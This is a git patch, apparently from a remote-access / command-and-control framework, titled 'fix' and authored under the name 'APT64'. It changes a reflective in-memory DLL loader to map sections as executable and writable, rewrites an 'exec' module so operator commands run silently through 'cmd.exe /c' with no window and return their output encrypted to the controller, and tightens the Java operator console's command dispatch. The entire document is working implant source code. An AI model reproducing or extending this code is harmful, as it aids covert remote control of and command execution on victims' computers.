From 5c7c3dfa76f4957c25397a6559bf4c4dd5da9810 Mon Sep 17 00:00:00 2001
From: APT64 <alexandrsinowalov@gmail.com>
Date: Thu, 21 Sep 2023 20:31:54 +0300
Subject: [PATCH] fix

fixed "exec" module && session lock
---
 .../ClSp/bin_files/ClSp_Tcp_Exe/mem_ldr.cpp   |  2 +-
 .../ClSp/bin_files/Exec/RegisterModule.cpp    | 74 ++++++++++++++++---
 src/main/java/manager/ExternalModules.java    |  3 +-
 3 files changed, 65 insertions(+), 14 deletions(-)

diff --git a/modules/ClSp/bin_files/ClSp_Tcp_Exe/mem_ldr.cpp b/modules/ClSp/bin_files/ClSp_Tcp_Exe/mem_ldr.cpp
index 49a678c..c586f33 100644
--- a/modules/ClSp/bin_files/ClSp_Tcp_Exe/mem_ldr.cpp
+++ b/modules/ClSp/bin_files/ClSp_Tcp_Exe/mem_ldr.cpp
@@ -137,7 +137,7 @@ PULONG _LoadLibrary(char* payload) {
 	{
 		if (reloc_table) {
 			if (__reloc_fix(image_base, (BYTE*)pref_base_addr, reloc_table)) {
-				VirtualProtect(sectionAddr, sectionMemSize, PAGE_EXECUTE_READ, &old);
+				VirtualProtect(sectionAddr, sectionMemSize, PAGE_EXECUTE_READWRITE, &old);
 				return (PULONG)sectionAddr;
 			}
 		}
diff --git a/modules/ClSp/bin_files/Exec/RegisterModule.cpp b/modules/ClSp/bin_files/Exec/RegisterModule.cpp
index 475c083..9a3c434 100644
--- a/modules/ClSp/bin_files/Exec/RegisterModule.cpp
+++ b/modules/ClSp/bin_files/Exec/RegisterModule.cpp
@@ -3,24 +3,76 @@
 #include <filesystem>
 #include <structs.h>
 
-std::string command_execute(const char* cmd) {
-    char line[256];
+HANDLE g_hChildStd_OUT_Rd = NULL;
+HANDLE g_hChildStd_OUT_Wr = NULL;
+
+HANDLE g_hInputFile = NULL;
+
+void CreateChildProcess(std::string szCmdline);
+std::string ReadFromPipe();
+
+std::string command_execute(std::string cmd)
+{
+    SECURITY_ATTRIBUTES saAttr;
+    saAttr.nLength = sizeof(SECURITY_ATTRIBUTES);
+    saAttr.bInheritHandle = TRUE;
+    saAttr.lpSecurityDescriptor = NULL;
+
+    CreatePipe(&g_hChildStd_OUT_Rd, &g_hChildStd_OUT_Wr, &saAttr, 0);
+    SetHandleInformation(g_hChildStd_OUT_Rd, HANDLE_FLAG_INHERIT, 0);
+    CreateChildProcess(cmd);
+
+    return ReadFromPipe();
+}
+
+void CreateChildProcess(std::string szCmdline)
+{
+    PROCESS_INFORMATION piProcInfo;
+    STARTUPINFO siStartInfo;
+    ZeroMemory(&piProcInfo, sizeof(PROCESS_INFORMATION));
+
+
+    ZeroMemory(&siStartInfo, sizeof(STARTUPINFO));
+    siStartInfo.cb = sizeof(STARTUPINFO);
+    siStartInfo.hStdError = g_hChildStd_OUT_Wr;
+    siStartInfo.hStdOutput = g_hChildStd_OUT_Wr;
+    siStartInfo.dwFlags |= STARTF_USESTDHANDLES;
+
+    CreateProcessA(NULL,
+        (LPSTR)szCmdline.c_str(),
+        NULL,
+        NULL,
+        TRUE,
+        CREATE_NO_WINDOW,
+        NULL,
+        NULL,
+        (LPSTARTUPINFOA)&siStartInfo,
+        &piProcInfo);
+
+    CloseHandle(piProcInfo.hProcess);
+    CloseHandle(piProcInfo.hThread);
+
+    CloseHandle(g_hChildStd_OUT_Wr);
+
+}
+
+std::string ReadFromPipe()
+{
+    DWORD dwRead;
+    CHAR chBuf[4096];
+    HANDLE hParentStdOut = GetStdHandle(STD_OUTPUT_HANDLE);
     std::string buffer;
-    FILE* pPipe;
-    if ((pPipe = _popen(cmd, "r")) == NULL)
-    {
-        return 0;
-    }
-    while (fgets(line, 256, pPipe))
-    {
-        buffer += line;
+
+    while (ReadFile(g_hChildStd_OUT_Rd, chBuf, sizeof(chBuf), &dwRead, NULL)) {
+        chBuf[dwRead] = 0;
+        buffer += chBuf;
     }
     return buffer;
 }
 
 extern "C" __declspec(dllexport) ULONG ModuleEntrypoint(MODULE_CONTEXT ctx) {
 	OUTPUT response = { 0 };
-	std::string _stdout = command_execute(ctx.argv.at(0).c_str());
+	std::string _stdout = command_execute("cmd.exe /c " + ctx.argv.at(0));
     response.output_length = _stdout.length();
 	memcpy(response.output, _stdout.data(), _stdout.length());
 	ctx.send_encrypted(ctx.aes_key, ctx.iv_key, ctx.connection, (char*)&response, sizeof(response));
diff --git a/src/main/java/manager/ExternalModules.java b/src/main/java/manager/ExternalModules.java
index 8de315b..3ed4820 100644
--- a/src/main/java/manager/ExternalModules.java
+++ b/src/main/java/manager/ExternalModules.java
@@ -21,8 +21,7 @@ public void processCommand(String args[]) {
         for (CommonModule module : GlobalVariables.commonModuleList){ //iterate loaded modules
 
             for (int j = 0; j < module.getCmdCount(); j++){ //iterate commands
-                if (commandName.equalsIgnoreCase(module.getCmd(j).CommandName)){
-
+                if (commandName.equalsIgnoreCase(module.getCmd(j).CommandName) && (module.getCmd(j).Dependency.equals("default") || module.getCmd(j).Dependency.equals("*"))){
                     if (args.length-1 != module.getCmd(j).getArgCount()){
                         currentConsole.printError("You provided " + (args.length-1) + " arguments, but only " + module.getCmd(j).getArgCount() +" were expected!\n");
                         return;